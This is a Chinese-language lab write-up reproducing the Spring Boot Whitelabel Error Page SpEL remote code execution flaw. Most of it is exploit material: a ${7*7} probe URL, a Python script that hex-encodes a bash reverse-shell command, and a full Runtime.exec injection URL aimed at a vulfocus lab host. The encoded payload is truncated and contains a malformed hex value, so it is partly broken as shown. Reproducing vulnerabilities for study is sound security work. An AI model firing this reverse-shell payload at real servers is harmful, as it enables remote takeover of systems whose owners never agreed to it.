所有文章,仅供安全研究与学习之用,后果自负!
- Spring-boot远程代码执行Whitelabel Error Page spel rce复现
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 0x04 漏洞修复
-
spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中
-
此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。
-
其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞。
-
spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0。
-
至少知道一个触发 springboot 默认错误页面的接口及参数名。
(1)访问靶场
(2)漏洞探测
/article?id=${7*7}
http://vulfocus.fofa.so:31068/article?id=${7*7}
(3)利用脚本 反弹shell
# coding: utf-8
result = ""
target = 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3Rjc}|{base64,-d}|{bash,-i}'
for x in target:
result += hex(ord(x)) + ","
print(result.rstrip(','))
http://vulfocus.fofa.so:31068/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x32d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}
反弹shell成功
0x04 漏洞修复升级至最新版本
参考
https://blog.csdn.net/lhh134/article/details/106795776
